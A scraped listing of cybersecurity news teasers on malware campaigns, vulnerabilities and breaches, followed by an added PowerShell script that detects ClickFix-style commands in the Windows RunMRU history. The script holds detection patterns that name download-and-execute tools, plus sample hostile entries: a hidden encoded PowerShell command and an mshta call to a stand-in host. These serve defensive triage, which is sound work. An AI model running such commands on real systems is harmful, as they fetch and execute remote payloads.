Network administrators and cybersecurity experts will be pleased to learn that OpenVPN 2.7_alpha2 will be released on June 19, 2025, according to the OpenVPN community project team. While this early alpha build for the upcoming 2.7.0 feature release introduces several…
Israeli Social Media Users Targeted in Covert Iranian Influence Campaign
A covert Iranian social media operation has been uncovered, targeting Israeli users on platform X with a psychological campaign designed to sow discord and despair. Researchers at the Foundation for Defense of Democracies (FDD) have exposed a Persian-language Telegram channel,…
Mattermost Vulnerabilities Let Attackers Execute Remote Code Via Path Traversal
Mattermost, a widely-used open-source collaboration platform, has recently disclosed critical vulnerabilities in its software that could allow attackers to execute remote code through path traversal exploits. As detailed on the official Mattermost Security Updates page, these flaws have been identified…
Aflac Cyber Attack – Hackers May Have Stolen Personal And Health Information
Aflac Incorporated, a Georgia-based insurance giant, identified unauthorized access to its network infrastructure, raising alarms over a potential data breach. The company swiftly activated its cybersecurity incident response protocols and claims to have contained the intrusion within hours of detection.…
CyberWarfare on the Rise With Surge in Hacktivist Activity Following Israel-Iran
Cyberspace has become a crucial battlefield in addition to conventional combat since the open conflict between Israel and Iran broke out. Following Israeli airstrikes on Iranian nuclear and military sites and Iran’s retaliatory missile salvos, both nations recognized as formidable…
DuckDuckGo Browser’s Scam Blocker to Guard Against Phishing and Malware Sites
DuckDuckGo has rolled out an advanced update to its browser’s built-in Scam Blocker, a robust security feature designed to shield users from a wide array of online threats, including phishing sites, malware, and sophisticated scams. Now integrated into the DuckDuckGo…
Open Directories Expose Publicly Available Tools Used by Hackers
A series of misconfigured web servers have been uncovered, revealing a treasure trove of publicly accessible tools and tactics employed by malicious actors targeting critical infrastructure. These exposed open directories, discovered through Hunt’s advanced scanning capabilities, highlight a significant security…
Surge in XSS Cyberattacks Targets Popular Webmail Platforms, ESET Reports
A recent report from ESET has uncovered a sophisticated cyber espionage campaign by the Russia-aligned Sednit group, targeting high-value webmail platforms through cross-site scripting (XSS) attacks. Dubbed Operation RoundPress, this operation has compromised popular webmail services such as Roundcube, Horde,…
Microsoft Announces New Graph Powered Detection of Hybrid Attack Targeting Organizations
Microsoft has unveiled a groundbreaking advancement in cybersecurity with the integration of the Enterprise Exposure Graph into its threat detection and response capabilities. This cutting-edge solution, part of Microsoft Defender XDR and Microsoft Security Exposure Management (MSEM), is designed to…
Iranian Hacktivists Attack Israeli Military, Government, and Infrastructure Targets
Over 35 different pro-Iranian hacktivist organizations launched a coordinated attack on Israeli military, government, and key infrastructure targets in a dramatic escalation of cyberwarfare. This surge in activity starkly contrasts with the limited response from just 4-5 identified pro-Israeli groups,…
Hackers Target 700+ ComfyUI AI Image Generation Servers to Spread Malware
China’s National Cybersecurity Notification Center has issued an urgent warning about critical vulnerabilities in ComfyUI, a widely used image-generation framework for large AI models. These flaws, already under active exploitation by hacker groups, have compromised at least 695 servers worldwide,…
Cyberattack Disrupts Russian Dairy Supply Chain by Targeting Animal Certification System
In Russia’s dairy supply chain, a suspected cyberattack has targeted the Mercury component of the national veterinary certification system, forcing it into emergency operation mode. This critical system, integral to the processing of veterinary accompanying documents, ensures the traceability…
Prometei Botnet Targets Linux Servers for Cryptocurrency Mining Operations
Unit 42 researchers from Palo Alto Networks have identified a renewed wave of attacks by the Prometei botnet, specifically targeting Linux servers, as of March 2025. Initially discovered in July 2020 with a focus on Windows systems, Prometei has since…
Beware of Weaponized MSI Installer Masquerading as WhatsApp to Deliver XWorm RAT
A newly identified cyber threat linked to a China-based threat actor has emerged, targeting users across East and Southeast Asia with a trojanized MSI installer disguised as a legitimate WhatsApp setup file. This deceptive campaign delivers a customized version of…
Mocha Manakin Uses Paste-and-Run Technique to Deceive Users into Downloading Malware
A malicious campaign tracked as Mocha Manakin has been identified employing the deceptive “paste-and-run” technique to trick unsuspecting users into executing harmful scripts. First observed in August 2024 and actively monitored since January 2025 by security researchers at Red Canary,…
Threat Actors Manipulate Google Search Results to Display Scammer’s Phone Number Instead of Real Number
Threat actors are increasingly exploiting the trust users place in sponsored search results on platforms like Google to orchestrate sophisticated scams. These malicious entities craft deceptive advertisements that mimic legitimate websites, particularly targeting popular brands and tech support services. By…
Insomnia API Client Vulnerability Enables Arbitrary Code Execution via Template Injection
A severe security vulnerability in the Insomnia API Client, a widely used tool by developers and security testers for interacting with APIs, has been uncovered by researchers at an offensive security consultancy. Discovered by Technical Director Marcio Almeida and Head…
Threat Actors Exploit Vercel Hosting Platform to Distribute Remote Access Malware
CyberArmor has uncovered a sophisticated phishing campaign exploiting Vercel, a widely used frontend hosting platform, to distribute a malicious variant of LogMeIn, a legitimate remote access tool. Over the past two months, threat actors have orchestrated at least 28 distinct…
TxTag Phishing Campaign Exploits .gov Domain to Deceive Employees
A new and alarming phishing campaign has surfaced, leveraging the credibility of a .gov domain to deceive employees into believing they owe unpaid tolls. Identified by the Cofense Phishing Defense Center (PDC), this campaign manipulates the GovDelivery system, a legitimate…
PowerShell Loaders Use In-Memory Execution to Evade Disk-Based Detection
A recent threat hunting session has revealed a sophisticated PowerShell script, named y1.ps1, hosted in an open directory on a Chinese server (IP: 123.207.215.76). First detected on June 1, 2025, this script operates as a shellcode loader, employing advanced in-memory…
Massive DDoS Attack Hits 7.3 Tbps Delivering 37.4 Terabytes in 45 Seconds
The internet witnessed a new record in cyberattacks last month as Cloudflare blocked the largest distributed denial-of-service (DDoS) attack ever recorded. The attack peaked at an astonishing 7.3 terabits per second (Tbps), overwhelming its target with 37.4 terabytes of data…
Azure Misconfiguration Lets Attackers Take Over Cloud Infrastructure
A recent security analysis has revealed how a chain of misconfigurations in Microsoft Azure can allow attackers to gain complete control over an organization’s cloud infrastructure, from initial access to full tenant takeover. The attack path, demonstrated using real-world tools…
AntiDot 3-in-1 Android Botnet Malware Grants Attackers Full Control Over Victim Devices
A new Android botnet malware named AntiDot has emerged as a formidable threat, granting cybercriminals unprecedented control over infected devices. Operated and sold by LARVA-398 as a Malware-as-a-Service (MaaS) on underground forums like XSS, AntiDot is marketed as a “3-in-1”…
Oxford City Council Hit by Cyberattack Exposing Employee Personal Data
Oxford City Council has confirmed it was the target of a sophisticated cyberattack that resulted in the exposure of personal data belonging to employees, including those involved in council-administered elections over the past two decades. The council detected an unauthorised…
GodFather Android Malware Uses On-Device Virtualization to Hijack Legitimate Banking Apps
Zimperium zLabs has uncovered a highly advanced iteration of the GodFather Android banking malware, which employs a groundbreaking on-device virtualization technique to compromise legitimate mobile banking and cryptocurrency applications. Unlike traditional overlay attacks that merely mimic login screens, this malware…
Versa Director Flaws Let Attackers Execute Arbitrary Commands
A newly disclosed set of vulnerabilities affects Versa Networks’ SD-WAN orchestration platform, Versa Director, with the flaws enabling authenticated attackers to upload malicious files and execute arbitrary commands on affected systems. The vulnerabilities, tracked as CVE-2025-23171 and CVE-2025-23172, stem from…
Microsoft Introduces Enhanced Security Defaults for Windows 365 Cloud PCs
Microsoft has announced a significant update to the security posture of its Windows 365 Cloud PCs, introducing new secure-by-default capabilities designed to fortify virtual desktop environments against modern cyber threats. These changes, set to roll out in the second half…
Dover Fueling Solutions Flaw Lets Attackers Control Fueling Operations
A newly disclosed critical vulnerability in Dover Fueling Solutions’ ProGauge MagLink LX consoles has sent shockwaves through the global fuel infrastructure sector. The flaw, tracked as CVE-2025-5310, allows remote attackers to seize control of fueling operations, manipulate tank monitoring, and…
Apache SeaTunnel Flaw Lets Unauthorized Users Launch Deserialization Attacks
A newly disclosed vulnerability in Apache SeaTunnel, a popular distributed data integration platform, has raised alarms in the cybersecurity community. The flaw, tracked as CVE-2025-32896, allows unauthorized users to exploit insecure REST API endpoints, enabling arbitrary file read and potentially…
IBM QRadar SIEM Bug Lets Attackers Run Arbitrary Commands
IBM has issued a critical security update for its QRadar SIEM platform after researchers uncovered multiple vulnerabilities, including a severe flaw that allows privileged users to execute arbitrary commands on affected systems. The vulnerabilities, disclosed in a security bulletin published…
16 Billion Passwords Stolen From 320 Million+ Computers Leaked Online
A staggering 16 billion login credentials, usernames, and passwords have been exposed in what cybersecurity experts are calling the largest data breach in internet history. The leak, which impacts major platforms including Apple, Facebook, Google, Instagram, Telegram, GitHub, and even…
Tesla Wall Connector Hacked Through Charging Port in Just 18 Minutes
Security researchers from Synacktiv successfully hacked the Tesla Wall Connector through its charging port in just 18 minutes, exposing critical vulnerabilities in the device’s firmware and communication protocols.
The Tesla Wall Connector and Its Architecture
The Tesla Wall Connector is…
Malicious Support Tickets Let Hackers Exploit Atlassian’s Model Context Protocol
A new class of cyberattack is targeting organizations leveraging Atlassian’s Model Context Protocol (MCP), exposing a critical weakness in the boundary between external and internal users. Researchers have demonstrated that malicious support tickets can be weaponized to exploit AI-powered workflows…
North Korean Hackers Deploy Malware Using Weaponized Calendly and Google Meet Links
The North Korean state-sponsored threat actor group, identified as TA444 (also known as BlueNoroff, Sapphire Sleet, and others), has unleashed a sophisticated malware campaign targeting cryptocurrency foundations. This intricate attack, uncovered by Huntress, leverages weaponized Calendly links and deceptive Google…
Over 100,000 WordPress Sites Exposed to Privilege Escalation via MCP AI Engine
The Wordfence Threat Intelligence team identified a severe security flaw in the AI Engine plugin, a widely used tool installed on over 100,000 WordPress websites. This vulnerability, classified as an Insufficient Authorization to Privilege Escalation via Model Context Protocol (MCP),…
Silver Fox APT Uses Weaponized Medical Software to Deploy Remote Access Tools and Disable AV
The China-based advanced persistent threat (APT) group Silver Fox, also known as Void Arachne or The Great Thief of Valley, has been identified as the orchestrator of a complex multi-stage campaign targeting healthcare delivery organizations (HDOs) and public sector entities.…
Gamers Targeted! Fake Minecraft Mods Enable Attackers to Take Control of Your System
Minecraft, the wildly popular sandbox game with over 200 million monthly active players, has become the latest hunting ground for cybercriminals. Check Point Research recently uncovered a sinister campaign targeting Minecraft users through the Stargazers Ghost Network, a Distribution as…
jQuery Migrate Library Compromised to Steal Logins via Parrot Traffic Direction System
Security researchers from the Trellix Advanced Research Centre have uncovered a sophisticated malware campaign exploiting the widely trusted jQuery Migrate library, a backward compatibility plugin used extensively in platforms like WordPress, Joomla, and Drupal. The attack, which began with a…
Hackers Deploy Amatera Stealer Using Advanced Web Injection and Anti-Analysis Techniques
Proofpoint has uncovered a rebranded and significantly enhanced information stealer named Amatera Stealer, derived from the previously known ACR Stealer. Identified in early 2025, this malware exhibits substantial code overlap with its predecessor but introduces advanced features and stealth mechanisms…
Android Spyware SpyNote Masquerading as Google Translate Found in Open Directories
Our team stumbled upon a disturbing array of SpyNote spyware samples lurking in open directories across the internet. These misconfigured digital repositories, often overlooked as mere storage spaces, have become unwitting hosts to dangerous malware targeting Android users.
Uncovering Hidden…
Krispy Kreme Data Breach Exposes Customer Personal Information
Krispy Kreme Doughnut Corporation has confirmed a significant data breach that exposed the personal information of over 160,000 individuals following a ransomware attack in late 2024. The incident, which affected both employees and customers, has raised concerns about data security…
Hackers Use VBScript Files to Deploy Masslogger Credential Stealer Malware
Seqrite Labs has uncovered a sophisticated variant of the Masslogger credential stealer malware being distributed through VBScript Encoded (.VBE) files. This advanced threat, which likely spreads via spam emails or drive-by downloads, operates as a multi-stage fileless malware, heavily exploiting…
Qilin Ransomware Rises as Major Threat, Demanding $50M in Ransom
The global cybersecurity landscape is facing a seismic shift as the Qilin ransomware group, also known as Agenda, has surged to the forefront of digital extortion, demanding ransoms as high as $50 million and disrupting critical services worldwide. Once an…
Golden SAML Attack: How Attackers Gain Control of Federation Server’s Private Key
The Golden SAML assault is a lesser-known but much more dangerous threat in a world where password-based hacks breach millions of accounts every month. Unlike common password sprays or phishing attempts, Golden SAML attacks are rare, with Microsoft reporting only…
Viasat Targeted in Cyberattack by Salt Typhoon APT Group
Viasat Inc., a leading U.S. satellite and wireless communications provider, has been identified as the latest victim in a sweeping cyberespionage campaign attributed to the Chinese state-sponsored group known as Salt Typhoon. The breach, which occurred during the 2024 U.S.…
Threat Actor Exploits GitHub and Hosts 60 Repositories Containing Hundreds of Malware Files
A threat actor group known as Banana Squad has been found exploiting GitHub, a cornerstone platform for developers worldwide, by hosting over 60 malicious repositories containing hundreds of trojanized Python files. Discovered by the ReversingLabs threat research team, this campaign…
Sophisticated Phishing Attack Uses ASP Pages to Target Prominent Russia Critics – Google
Google Threat Intelligence Group (GTIG), in collaboration with external partners, has uncovered a sophisticated phishing campaign orchestrated by a Russia state-sponsored cyber threat actor, tracked as UNC6293. Active from at least April through early June 2025, this campaign specifically targeted…
ClamAV 1.4.3 and 1.0.9 Released with Fixes for Critical Remote Code Execution Vulnerability
The ClamAV development team has rolled out two crucial security patch releases, versions 1.4.3 and 1.0.9, aimed at resolving significant vulnerabilities that could compromise system integrity. Alongside these patches, the team has introduced Linux aarch64 (ARM64) RPM and DEB installer…
Hackers Exploit Cloudflare Tunnels to Infect Windows Systems With Python Malware
A sophisticated malware campaign dubbed SERPENTINE#CLOUD has emerged, leveraging Cloudflare Tunnel infrastructure to deliver Python-based malware to Windows systems across Western nations, including the United States, United Kingdom, and Germany. This ongoing operation, characterized by its use of obfuscated scripts…
Microsoft Entra ID Adds Passkey (FIDO2) Support in Public Preview
Microsoft has announced a significant update to its identity platform, Microsoft Entra ID, with the introduction of expanded passkey (FIDO2) support in public preview. Set to roll out globally from mid-October to mid-November 2025, this enhancement marks a major step…
Jitter-Trap: New Method Uncovers Stealthy Beacon Communications
A groundbreaking detection technique called Jitter-Trap has been unveiled by Varonis Threat Labs, promising to revolutionize how organizations identify one of the most elusive stages in the cyberattack lifecycle: post-exploitation and command-and-control (C2) communication. This method leverages the very randomness that threat…
LogMeIn Remote Access Abused in Targeted System Compromise
A sophisticated cyberattack campaign has been uncovered, leveraging LogMeIn Resolve remote access software to gain unauthorized control over user systems. Security researchers report that the attack begins with a convincingly crafted invoice-themed spam email, designed to trick recipients into opening…
Cisco AnyConnect VPN Flaw Allows Attackers to Launch DoS Attacks
A newly disclosed vulnerability in Cisco’s AnyConnect VPN implementation for Meraki MX and Z Series devices poses a significant risk to enterprise networks, enabling unauthenticated attackers to disrupt remote access by triggering denial-of-service (DoS) conditions. The flaw, tracked as CVE-2025-20271,…
Ransomware Gang Busted by Authorities; Devices and Evidence Seized
Thai authorities have dismantled a sophisticated criminal enterprise operating from the eight-storey Antai Holiday Hotel in Pattaya, unearthing both a high-stakes gambling den and a cybercrime ring specializing in ransomware attacks. The raid, conducted at 11:30 p.m. on June 16,…
Apache Traffic Server Vulnerability Allows DoS Attacks Through Memory Exhaustion
A newly disclosed vulnerability in Apache Traffic Server (ATS) has raised serious concerns among enterprise users and cloud providers, as attackers can exploit a flaw in the Edge Side Includes (ESI) plugin to trigger denial-of-service (DoS) attacks by exhausting server…
Password Reset Link Poisoning Leads to Full Account Takeover
A critical vulnerability known as Password Reset Link Poisoning has recently come under the spotlight, exposing web users and organizations to the risk of full account takeover. This flaw, which leverages Host Header Injection, enables attackers to manipulate the domain in password…
Open Next SSRF Flaw in Cloudflare Lets Hackers Fetch Data from Any Host
A critical Server-Side Request Forgery (SSRF) vulnerability has been discovered in the @opennextjs/cloudflare package, posing a significant security threat to websites deployed using the Cloudflare adapter for Open Next. The flaw, now tracked as CVE-2025-6087, allows unauthenticated attackers to proxy…
AI Revolutionizes PLA Military Intelligence with Rapid Deployment Across Operations
The People’s Liberation Army (PLA) of China has adopted generative artificial intelligence (AI) to revolutionize its intelligence capabilities, marking a major step in modernizing military operations. According to recent analyses, the PLA has shown a clear intent to integrate generative…
Chollima Hackers Target Windows and MacOS with New GolangGhost RAT Malware
A North Korean-affiliated threat actor called Famous Chollima (also known as Wagemole) has launched a sophisticated remote access trojan (RAT) campaign against Windows and MacOS devices, a concerning development discovered by Cisco Talos in May 2025. This group, suspected to…
Russia’s Digital Arsenal: The Strategic Use of Private Companies and Hacktivists in Cyber Operations
Russia’s sophisticated cyber warfare strategy emerges as a calculated blend of state power and non-state agility, leveraging private companies, hacktivists, and criminal proxies to amplify its digital dominance. The roots of this hybrid model trace back to the collapse of…
MITRE and Splunk Expose Critical Vulnerabilities in Open Source GitHub Actions
The Sysdig TRT has uncovered critical vulnerabilities in the GitHub Actions workflows of several high-profile open source projects, including those maintained by MITRE and Splunk. GitHub Actions, a popular platform for automating CI/CD pipelines, offers immense flexibility for developers but…
Microsoft Enhances Office 365 Defender to Stop Email Bombing Campaigns
Microsoft has announced a significant enhancement to its Office 365 Defender suite with the introduction of Mail Bombing Detection, a new feature designed to combat the rising threat of email bombing attacks. This capability will be rolled out globally, starting…
Hackers Exploit Transit Mode in Apple Pay and GPay to Steal Money
Mobile wallets like Apple Pay and Google Pay (GPay) have revolutionized the way we pay, offering speed and convenience that traditional cards can’t match. But as recent research and real-world incidents show, these digital wallets are not immune to attack.…
Zyxel NWA50AX Pro Hit by N-Day Flaw Allowing Arbitrary File Deletion
A recent vulnerability has been discovered in the Zyxel NWA50AX Pro, a WiFi 6 access point for small businesses, exposing it to an n-day flaw that allows arbitrary file deletion via a misconfigured CGI endpoint. This issue, tracked as CVE-2024-29974,…
SuperCard Malware Hijacks Android Devices to Steal Payment Card Data and Relay it to Attackers
F6, a leading developer of technologies to combat cybercrime, has reported the emergence of SuperCard, a malicious modification of the legitimate NFCGate program, now targeting Android users globally, with recent attacks recorded in Russia. Initially detected in Europe during spring…
DMV-Style Phishing Scams Target U.S. Citizens to Harvest Sensitive Information
A highly coordinated phishing campaign surfaced, targeting U.S. citizens by impersonating various state Departments of Motor Vehicles (DMVs). This widespread attack utilized SMS phishing, or “smishing,” as its primary delivery vector, bombarding victims with alarming text messages about fictitious unpaid…
RapperBot Botnet Surges with 50,000+ Attacks Targeting Network Edge Devices
The RapperBot botnet has resurfaced with unprecedented aggression, targeting network edge devices in a staggering series of over 50,000 attacks. Identified and detailed by researchers at Qianxin XLab, this botnet represents a sophisticated threat to Internet of Things (IoT) ecosystems,…
BlackHat AI Tool WormGPT Enhanced with Grok and Mixtral
The rapid evolution of large language models (LLMs) has not only transformed legitimate industries but has also found its way into the hands of cybercriminals. WormGPT, a notorious blackhat AI tool, has recently resurfaced in enhanced forms powered by advanced…
Google Chrome Vulnerabilities Enable Arbitrary Code Execution – Update Now!
Google has released a crucial security update for its Chrome browser, addressing multiple high-severity vulnerabilities that could allow attackers to execute arbitrary code on affected systems. The update, now rolling out as version 137.0.7151.119/.120 for Windows and Mac, and 137.0.7151.119…
VMware Unveils Cloud Foundation 9.0 With AI and Next-Gen Workloads
VMware has officially announced the general availability of VMware Cloud Foundation (VCF) 9.0, marking a significant leap in private cloud technology designed to meet the demands of AI, data-intensive workloads, and modern enterprise operations. For years, organizations faced a stark…
Qilin Ransomware Emerges as a Major Threat Targeting Windows, Linux, and ESXi Systems
Qilin ransomware has emerged as a formidable force, rapidly ascending to prominence amid the collapse of once-dominant groups like RansomHub and LockBit in 2025. Active since October 2022, Qilin has solidified its position through a sophisticated Ransomware-as-a-Service (RaaS) model, offering…
Cybercriminals Leverage ClickFix Strategy to Deploy RATs and Data-Stealing Malware
Cybercriminals are increasingly exploiting a deceptive social engineering technique known as ClickFix to initiate multi-stage cyberattacks, delivering remote access trojans (RATs) and data-stealing malware with alarming efficiency. First identified in March 2024, ClickFix manipulates users into executing malicious PowerShell commands…
New Winos 4.0 Malware Strain Emerges as Major Threat to Windows Systems
FortiGuard Labs has uncovered a formidable new strain of malware, dubbed Winos 4.0, targeting Microsoft Windows users, with a particular focus on individuals in Taiwan. First detected in January 2025, this malicious campaign leverages cunning phishing tactics, masquerading as communications…
Critical Privilege Escalation Flaws Grant Full Root Access on Multiple Linux Distros
The Qualys Threat Research Unit (TRU) has uncovered two interconnected local privilege escalation (LPE) vulnerabilities—CVE-2025-6018 and CVE-2025-6019—that together enable attackers to gain full root access on a wide range of Linux distributions with minimal effort. These flaws impact both desktop…
Hackers Claim Breach of Scania Financial Services, Leak Sensitive Data
A significant data breach has rocked Sweden’s Scania Financial Services, as a threat actor operating under the alias “hensi” claims to have infiltrated the subdomain insurance.scania.com, exfiltrating a trove of sensitive files and offering them for sale on underground forums. …
CISA Alerts to Active Exploits of Linux Kernel Improper Ownership Management Vulnerability
The Cybersecurity and Infrastructure Security Agency (CISA) issued an urgent alert regarding active exploitation of a critical Linux kernel vulnerability, tracked as CVE-2023-0386, which has now been added to the Known Exploited Vulnerabilities (KEV) Catalog. This flaw, rooted in the…
Google’s Gerrit Platform Flaw Exposes 18 Google Projects, Including ChromiumOS, to Hackers
A critical vulnerability, dubbed “GerriScary,” has been discovered in Google’s Gerrit code-collaboration platform, putting at least 18 major Google projects—including ChromiumOS, Chromium, Dart, and Bazel—at risk of unauthorized code submissions by hackers. This flaw, uncovered by Tenable Cloud Research, highlights…
Citrix NetScaler ADC & Gateway Flaws Expose Sensitive Data to Hackers
Two critical vulnerabilities have been discovered in Citrix NetScaler ADC (formerly Citrix ADC) and NetScaler Gateway (formerly Citrix Gateway), potentially exposing sensitive data to hackers and putting enterprise networks at significant risk. The flaws, identified as CVE-2025-5349 and CVE-2025-5777, have…
Veeam Vulnerabilities Expose Backup Servers to Remote Attacks
Veeam, a leading provider of data protection and backup solutions, disclosed three critical vulnerabilities affecting its widely deployed backup software. These flaws—assigned CVE-2025-23121, CVE-2025-24286, and CVE-2025-24287—could allow attackers to execute code remotely or escalate privileges, posing significant risks to organizations…
New Sorillus RAT Targets European Organizations Through Tunneling Services
In March 2025, Orange Cyberdefense’s Managed Threat Detection teams in Belgium discovered that a European client had been targeted by a malicious infection chain that used the Sorillus Remote Access Trojan (RAT). Further analysis by…
New Chaos RAT Variants Targeting Windows and Linux Systems to Steal Sensitive Data
The Acronis Threat Research Unit has identified new variants of Chaos RAT, a remote administration tool (RAT) that has evolved from an open-source project first observed in 2022 into a formidable multi-platform malware. These latest iterations of Chaos RAT are…
New KimJongRAT Stealer Uses Weaponized LNK File to Deploy PowerShell-Based Dropper
Two new variants of the KimJongRAT stealer have emerged, showcasing the persistent and evolving nature of this malicious tool first identified in 2013. Detailed research by Palo Alto Networks’ Unit 42 reveals that these variants, one employing a Portable…
New Sophisticated Multi-Stage Malware Campaign Uses VBS Files to Execute PowerShell Script
A recently uncovered malware campaign has revealed a highly sophisticated, multi-stage infection process utilizing heavily obfuscated Visual Basic Script (VBS) files to deploy remote access trojans (RATs) such as Remcos, LimeRAT, DCRat, and AsyncRAT. Discovered across a cluster of 16…
Beware: Weaponized Research Papers Delivering Malware Through Password-Protected Documents
The AhnLab Security Intelligence Center (ASEC) recently revealed that the infamous Kimsuky hacking group was connected to a phishing email campaign targeting unsuspecting users. Disguised as a seemingly legitimate request for a paper review from…
XDSpy Threat Actors Exploit Windows LNK Zero-Day Vulnerability to Target Windows System Users
The XDSpy threat actor has been identified as exploiting a Windows LNK zero-day vulnerability, dubbed ZDI-CAN-25373, to target governmental entities in Eastern Europe and Russia. This ongoing campaign, active since March 2025, employs an intricate multi-stage infection chain to deploy…
Kimsuky and Konni APT Groups Lead Active Attacks Targeting East Asia
A significant 20 Advanced Persistent Threat (APT) incidents were identified in April 2025, according to a new report from Fuying Lab’s worldwide threat hunting system. East Asia emerges as a primary hotspot, where the notorious APT groups Kimsuky and Konni…
Critical Vulnerabilities in Sitecore Could Lead to Widespread Enterprise Attacks
A series of newly disclosed critical vulnerabilities in the Sitecore Experience Platform (XP) have raised alarm across the enterprise technology sector, with security researchers warning that unpatched systems could be exposed to devastating remote code execution (RCE) attacks. Sitecore, a…
BeyondTrust Tools RCE Vulnerability Allows Attackers to Execute Arbitrary Code
A newly disclosed vulnerability in BeyondTrust’s Remote Support (RS) and Privileged Remote Access (PRA) products has raised alarms across the cybersecurity community. The flaw, tracked as CVE-2025-5309 and detailed in advisory BT25-04, allows attackers to execute arbitrary code on affected…
Hackers Manipulate Search Engines to Push Malicious Sites
A new wave of cybercrime is exploiting the very backbone of internet trust: search engines. Recent research by Netcraft has exposed a sophisticated and organized SEO poisoning operation, where hackers manipulate search engine algorithms to push malicious websites to the…
Hackers Use Fake Verification Prompt and Clickfix Technique to Deploy Fileless AsyncRAT
Threat actors are leveraging deceptive tactics to distribute a fileless variant of AsyncRAT, a notorious remote access Trojan. Discovered during routine attacker infrastructure analysis, this operation employs a fake verification prompt themed around the “Clickfix” technique to trick users into…
WhatsApp’s Status Tab Set to Feature Ads as Meta Monetizes Platform
WhatsApp, the world’s most popular messaging app, is entering a new era as Meta officially begins rolling out advertisements within its Updates tab—a move that marks the platform’s most significant shift in monetization since its inception. The announcement, made on…
ASUS Armoury Crate Vulnerability Lets Hackers Gain System-Level Access on Windows
A critical vulnerability in ASUS’s popular Armoury Crate software has exposed millions of Windows users to the risk of system-level compromise, according to a recent disclosure by Cisco Talos and confirmed by ASUS. The flaw, tracked as CVE-2025-3464, allows attackers…
Critical sslh Vulnerabilities Allow Remote Denial-of-Service Attacks
Security researchers disclosed two critical vulnerabilities in sslh, a widely used protocol multiplexer that enables multiple services—such as SSH, HTTPS, and OpenVPN—to share a single network port. These flaws, tracked as CVE-2025-46807 and CVE-2025-46806, could allow remote attackers to crash…
Water Curse Hacker Group Uses 76 GitHub Accounts to Spread Multistage Malware
A newly identified threat actor known as Water Curse has been linked to a sprawling campaign utilizing at least 76 GitHub accounts to distribute weaponized repositories packed with multistage malware. This financially motivated group leverages the inherent trust in open-source…
Hackers Exploiting Chrome Zero‑Day Vulnerability in the Wild
A newly discovered zero-day vulnerability in Google Chrome, tracked as CVE-2025-2783, is being actively exploited by hackers in sophisticated cyber-espionage campaigns. Security researchers have observed a surge in targeted attacks leveraging this flaw, with attribution pointing to the advanced persistent…
150K+ Users Affected by Malicious Loan Apps on iOS and Google Play
Over 150,000 users across Google Play and the Apple App Store have fallen victim to a malicious SpyLoan application named “RapiPlata,” which was identified in February 2025 by advanced detection engines. This app, posing as a legitimate financial service primarily…
CISA Alerts: iOS Zero‑Click Flaw Actively Exploited
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has issued a high-priority alert following the discovery and active exploitation of a critical zero-click vulnerability in Apple’s ecosystem, tracked as CVE-2025-43200. This flaw, now patched, enabled attackers to compromise iOS, iPadOS,…
Android Devices Under Siege: How Threat Actors Abuse OEM Permissions for Privilege Escalation
Threat actors are increasingly exploiting legitimate channels to achieve privilege escalation, posing a severe risk to millions of devices worldwide. While conventional exploits remain a concern, a more insidious danger emerges from applications gaining excessive system access through mechanisms such…
DeerStealer Malware Deployed Through Exploitation of Windows Run Prompt by Threat Actors
eSentire's Threat Response Unit (TRU) has uncovered a series of malicious campaigns throughout May 2025 in which threat actors deployed the DeerStealer malware, also known as XFiles Spyware, using the HijackLoader malware loader. This sophisticated information stealer, peddled…
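Both the Clickfix fake-verification lure above and the Run-prompt delivery of DeerStealer rely on the victim pasting an attacker-supplied command into the Windows Run dialog (Win+R). Windows keeps a history of those commands under the current user's RunMRU registry key, which makes it a cheap triage artifact. The following PowerShell is an added example written for this page, not code from the article, eSentire, or any vendor; the detection patterns and the sample entries are constructed for illustration and should be tuned to your environment.

```powershell
# Added example: flag suspicious Win+R Run-dialog history, the artifact a
# ClickFix-style lure leaves behind when a victim pastes a command into the
# Run prompt. Windows records those commands under
# HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU as values
# "a", "b", "c", ... ordered by the MRUList value, each stored as "<command>\1".

# Illustrative patterns (assumption: typical ClickFix/loader one-liners).
$SuspiciousPatterns = @(
    'powershell(\.exe)?\s.*(-e|-enc|-encodedcommand)\b',
    'powershell(\.exe)?\s.*(-w|-window|-windowstyle)\s+hidden',
    '\biex\b|invoke-expression',
    '\b(downloadstring|downloadfile|invoke-webrequest|iwr|curl|wget|bitsadmin)\b',
    '\bmshta(\.exe)?\s+(https?|vbscript|javascript):',
    '\bcertutil(\.exe)?\s.*-urlcache',
    '\bconhost\.exe\s+--headless'
)

function Test-SuspiciousRunEntry {
    # Returns the first matching pattern, or $null when the command looks benign.
    param([Parameter(Mandatory)][string]$Command)
    foreach ($p in $SuspiciousPatterns) {
        if ($Command -imatch $p) { return $p }
    }
    return $null
}

function Get-RunMruEntries {
    # Reads RunMRU in MRUList order (most recent first) and strips the "\1" marker.
    param([string]$Path = 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU')
    if (-not (Test-Path $Path)) { return @() }
    $key   = Get-ItemProperty -Path $Path
    $order = if ($key.MRUList) { $key.MRUList.ToCharArray() } else { @() }
    foreach ($slot in $order) {
        $raw = $key.$slot
        if ($raw) {
            [pscustomobject]@{ Slot = "$slot"; Command = ($raw -replace '\\1$', '') }
        }
    }
}

function Find-ClickFixArtifacts {
    # Defaults to the live RunMRU; pass -Entries to analyse exported/sample data.
    param([object[]]$Entries = (Get-RunMruEntries))
    foreach ($e in $Entries) {
        $hit = Test-SuspiciousRunEntry -Command $e.Command
        if ($hit) {
            [pscustomobject]@{ Slot = $e.Slot; Command = $e.Command; MatchedPattern = $hit }
        }
    }
}

# Constructed sample entries (not real telemetry) so the logic can be run offline.
$Sample = @(
    [pscustomobject]@{ Slot = 'a'; Command = 'notepad' },
    [pscustomobject]@{ Slot = 'b'; Command = 'powershell -w hidden -enc SQBFAFgA' },
    [pscustomobject]@{ Slot = 'c'; Command = 'mshta https://example.invalid/verify' },
    [pscustomobject]@{ Slot = 'd'; Command = 'cmd /c echo ok' }
)
Find-ClickFixArtifacts -Entries $Sample | Format-Table -AutoSize
# On a live host, call Find-ClickFixArtifacts with no arguments to check the
# current user's RunMRU; run it under each user profile (or load their NTUSER.DAT)
# for a full picture.
```

RunMRU only records what was typed into the Run dialog, so it misses lures that route the same command through a terminal or a browser-spawned shell; pair this check with process-creation telemetry (explorer.exe spawning powershell.exe or mshta.exe with a long command line) rather than relying on it alone.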
GCHQ Intern Sentenced to 7 Years for Illegally Copying Secret Files to Smartphone
